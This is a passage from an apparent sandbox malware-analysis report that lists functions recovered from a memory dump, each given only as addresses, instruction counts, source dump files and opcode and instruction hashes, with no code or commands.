                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: e8886eabde1d6a875bd78148138319d4823bb75e0bee8e79633937e5d6d8fb5e
                                                                                                                                                                                            • Instruction ID: 046adf37a1e51bf08b9de9393daf87d194a665d8bdff9aad17e02b4617e2b2f7
                                                                                                                                                                                            • Opcode Fuzzy Hash: e8886eabde1d6a875bd78148138319d4823bb75e0bee8e79633937e5d6d8fb5e
                                                                                                                                                                                            • Instruction Fuzzy Hash: 07C1F075E003169FEF18CF59C854BAEB7B6BF84710F188269E864EB684D731E941CB90
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D31763 Relevance: .3, Instructions: 322COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: b9140f30bc85287cdccf416003ce16b06f54daccc25338e4f03a5a5328159b20
                                                                                                                                                                                            • Instruction ID: d563b0250d76f1d8c000a5520700b80d4d38e406bb0cf2bdc5ce6121fd2d96c9
                                                                                                                                                                                            • Opcode Fuzzy Hash: b9140f30bc85287cdccf416003ce16b06f54daccc25338e4f03a5a5328159b20
                                                                                                                                                                                            • Instruction Fuzzy Hash: 74D113B59012059FDB41DF68C980B8ABBE9FF09754F4840BAED49DF216DB31D905CBA0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D0F380 Relevance: .3, Instructions: 321COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: ee8edfe26b103974a872d31c2b4944618a981d01375d2a5ae64a45828fe9da2f
                                                                                                                                                                                            • Instruction ID: ee47def2fb599298c1728a8c2609e9ac90f127bfbdd569100e146cb8be7e8bd3
                                                                                                                                                                                            • Opcode Fuzzy Hash: ee8edfe26b103974a872d31c2b4944618a981d01375d2a5ae64a45828fe9da2f
                                                                                                                                                                                            • Instruction Fuzzy Hash: C1C1F5B5E053248BEB04CF69C494769B7B9FB48F44F694299EC819F291DB34C941CF60
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CF37E4 Relevance: .3, Instructions: 303COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 013ff2eab3a99ba44cd0991048fcf2c521af40e6d1b1a40ebb3b39ac1d9d017b
                                                                                                                                                                                            • Instruction ID: fee47d8ddcb702e699a4f9d214e333c5b2df5e8988525b3404c8458ca5afba13
                                                                                                                                                                                            • Opcode Fuzzy Hash: 013ff2eab3a99ba44cd0991048fcf2c521af40e6d1b1a40ebb3b39ac1d9d017b
                                                                                                                                                                                            • Instruction Fuzzy Hash: 94C154B1D00709AFDB55CFA9C850A9EBBF8FB48740F15416AE41AEB750EB35A901CF60
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CF93A6 Relevance: .3, Instructions: 259COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 657de1b0e62a59360857d2ae8d885e1538a31c835e7b53e6eef62683726e7999
                                                                                                                                                                                            • Instruction ID: dbb612e7680846642a64cd1b537805922da7dbef511842ad8413f66529aa7bab
                                                                                                                                                                                            • Opcode Fuzzy Hash: 657de1b0e62a59360857d2ae8d885e1538a31c835e7b53e6eef62683726e7999
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3AB17BB99007058FEF55EF29C4807A9BBF4BF18754F14815AE861DB291DB32D886CF90
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CF7290 Relevance: .2, Instructions: 247COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 4903439a01fd67eadb32a5b7d2898d0f171ca996555aadf9303db0fd6c2058a3
                                                                                                                                                                                            • Instruction ID: e4c43a1dd7022eaa23c965ec5dbaed98c526c7ad8325d5bd51f8b6dded61a579
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4903439a01fd67eadb32a5b7d2898d0f171ca996555aadf9303db0fd6c2058a3
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2CA15675A08742CFE354CF29C480A1ABBE9BF88784F14496EF584DB750EB31E945CB92
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33DAB0AF Relevance: .2, Instructions: 222COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 3bd6bb45f2ff03ac3460fc56b718573f81f2f6c7441370bccea4be0320480504
                                                                                                                                                                                            • Instruction ID: a56a9158efe2d58daf88aa971ade547a7e66148cf16276d0ee7c84180d407668
                                                                                                                                                                                            • Opcode Fuzzy Hash: 3bd6bb45f2ff03ac3460fc56b718573f81f2f6c7441370bccea4be0320480504
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5C71C575E2021A9BDB00CF5DC690AAFB7F9BF44B80F99411AD881EB244E774D946C7A0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33DB970B Relevance: .2, Instructions: 210COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 4ae8aee1e85fff6d581e628ac33b47243bca23092dfe810bd28035b8948274af
                                                                                                                                                                                            • Instruction ID: a2a331238acd3ba4c7089558ba3618dfb5c283e5dd02aee7ab8787a59ca8e1c2
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4ae8aee1e85fff6d581e628ac33b47243bca23092dfe810bd28035b8948274af
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3661B2B8F012959BDF158F64C880BAE77BAAF84B50F584259E853A7384DB30DD41C7A0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CF98DE Relevance: .2, Instructions: 178COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 7a6ca165217595117f7392e197d43a17d057fa939921492771c137c22517cd97
                                                                                                                                                                                            • Instruction ID: 1b038d9baa3e586c3683a9f5e33b3a9a66a3b33bc2d8b6daef59486ddd5dc282
                                                                                                                                                                                            • Opcode Fuzzy Hash: 7a6ca165217595117f7392e197d43a17d057fa939921492771c137c22517cd97
                                                                                                                                                                                            • Instruction Fuzzy Hash: A851ED75E00305DBEF48CF55C4806AEB7B5FF44340F5A81A9E849EB654EB32AA45CB90
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CEB931 Relevance: .2, Instructions: 172COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: c1532aa829f43c1155ab8bc9f0412621078da7b9c1c9d8218b8de0fe98fafffe
                                                                                                                                                                                            • Instruction ID: 0007184300dcf9fed1494069c21ee0b29ef6d30980538651e268ec05ad527d8f
                                                                                                                                                                                            • Opcode Fuzzy Hash: c1532aa829f43c1155ab8bc9f0412621078da7b9c1c9d8218b8de0fe98fafffe
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0361D179D05319AFEB20CF64C840BAEBBB0FF05B60F1441B9E895AB285DB754945CF90
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D29ABF Relevance: .2, Instructions: 165COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 08be75a3df595b25ce580cebb030d60ba34f4e64a53b6b47d41314212216fa59
                                                                                                                                                                                            • Instruction ID: b44b23a707ab7d38a6b03daf3067a100cf50acb59b738ee7e972a712e714d26b
                                                                                                                                                                                            • Opcode Fuzzy Hash: 08be75a3df595b25ce580cebb030d60ba34f4e64a53b6b47d41314212216fa59
                                                                                                                                                                                            • Instruction Fuzzy Hash: ED6184B5E017159FDB05CF68C440B89BBF4BF49B28F14826AE81AEB640D734A950CBA0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CF77F9 Relevance: .2, Instructions: 164COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 480d613478cdaacfa0bd54de48992b8b728ce26b33da67232b4f20a117578032
                                                                                                                                                                                            • Instruction ID: e20b4d2804debe1776877a74c080fb37e40beb9e230d7b661059d41cf96e0fd6
                                                                                                                                                                                            • Opcode Fuzzy Hash: 480d613478cdaacfa0bd54de48992b8b728ce26b33da67232b4f20a117578032
                                                                                                                                                                                            • Instruction Fuzzy Hash: 28515375A08341CFE754CF29C080A1ABBF9FB88A80F54496EF599DB750DB31E944CB92
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33DABB40 Relevance: .2, Instructions: 162COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: fae01c3fd95582de9779016b234f99c0438632d43d7d65269239a59648bef338
                                                                                                                                                                                            • Instruction ID: d075d6ebf643dc8fcff3e51e851c27d42dcf5c8082a9c1eb5e55b0d8eced54a1
                                                                                                                                                                                            • Opcode Fuzzy Hash: fae01c3fd95582de9779016b234f99c0438632d43d7d65269239a59648bef338
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2151D57A91021A9ADB04DF6DC690EBAB7B9FF40B84B54845EF8818B501EF34CD83C760
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D6D250 Relevance: .2, Instructions: 161COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 841ddc28af16eda66a065c12b7bbd1f33eb2c64351661267d32a9e5a5bf1116f
                                                                                                                                                                                            • Instruction ID: ee73e1c22423a0e3cf044e718d3f4b2bcdce57cf1f2517c6db6213875911667e
                                                                                                                                                                                            • Opcode Fuzzy Hash: 841ddc28af16eda66a065c12b7bbd1f33eb2c64351661267d32a9e5a5bf1116f
                                                                                                                                                                                            • Instruction Fuzzy Hash: 22511BB6A043129BCB019F64EC40A6B77E5EFC868CF840829F990E7254EB31DC15C7B2
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CEB273 Relevance: .2, Instructions: 161COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 22a31ebddce08c51985821f26a0ee8a01ae6c473604b930768a8955cdfb3cfa2
                                                                                                                                                                                            • Instruction ID: 96ff20c0540245f8ac7378821772911c0d170c58c1d221037be54908836f406e
                                                                                                                                                                                            • Opcode Fuzzy Hash: 22a31ebddce08c51985821f26a0ee8a01ae6c473604b930768a8955cdfb3cfa2
                                                                                                                                                                                            • Instruction Fuzzy Hash: D3416B72A02700EFD7268F69C841B2A7BA9FF40B51F15802AF545DB660DFB0DC41CBA0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D2B490 Relevance: .2, Instructions: 161COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 1cacaabf330af00e2b218dfd7b597297622aedb94560d17c1aeedc8814255059
                                                                                                                                                                                            • Instruction ID: 99d956f6894fd16f06415bfb8c9eee0b725954d93131679498c08a707dc75b7b
                                                                                                                                                                                            • Opcode Fuzzy Hash: 1cacaabf330af00e2b218dfd7b597297622aedb94560d17c1aeedc8814255059
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F51BFB29003059FE320DF65DC80F5A7BE8EB85768F14062EF96197691DB34D849CBB2
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D194FA Relevance: .2, Instructions: 160COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                            • Opcode ID: bbfe68a85f05158d191cc08a207198dd4c7d5637e1986f900dba471fe48653ea
                                                                                                                                                                                            • Instruction ID: 3d649fcc800e7c83b881403e94054a349b566de2095e3d3246754b828c1fc5a1
                                                                                                                                                                                            • Opcode Fuzzy Hash: bbfe68a85f05158d191cc08a207198dd4c7d5637e1986f900dba471fe48653ea
                                                                                                                                                                                            • Instruction Fuzzy Hash: CE519771D44309ABFB628FA8D880BDEBBB8FB01740F60002AE596A7159DB718914DB20
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D03660 Relevance: .2, Instructions: 159COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 129c60a5051ee52c80a5a2f65c9253265fa4594a48b2d38f60b5b207bbf6d125
                                                                                                                                                                                            • Instruction ID: 35375854acb9944ca203d0be3811422cc67346b3d816750cac24dd8acaeae9c4
                                                                                                                                                                                            • Opcode Fuzzy Hash: 129c60a5051ee52c80a5a2f65c9253265fa4594a48b2d38f60b5b207bbf6d125
                                                                                                                                                                                            • Instruction Fuzzy Hash: F351DFB9A11655AFD301CF68C880669B7B0FF84B10F5442A5E884DBB40E734E995CFD0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CF510D Relevance: .1, Instructions: 149COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 34a1d15da719948f87259204e3a8f845b155813803e0898065c60c7e1b5492b9
                                                                                                                                                                                            • Instruction ID: 324bb94ec02bb0452e17b0f9544488fcfdb29c8702c9b784b39d3700f2f9b495
                                                                                                                                                                                            • Opcode Fuzzy Hash: 34a1d15da719948f87259204e3a8f845b155813803e0898065c60c7e1b5492b9
                                                                                                                                                                                            • Instruction Fuzzy Hash: A9517BB5E013159FFB51CFA8C840B9DB7B8BF08795F154619EA00FB252DB7AE9408B60
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D856E0 Relevance: .1, Instructions: 148COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 54d17f16e73df959ade6801bfd14df47c5558d1bd833c14dc3138929320731b6
                                                                                                                                                                                            • Instruction ID: bbe6ad04f973615e95d8330a3f68ddc8b918c3798a55c20d1f47418968e19a97
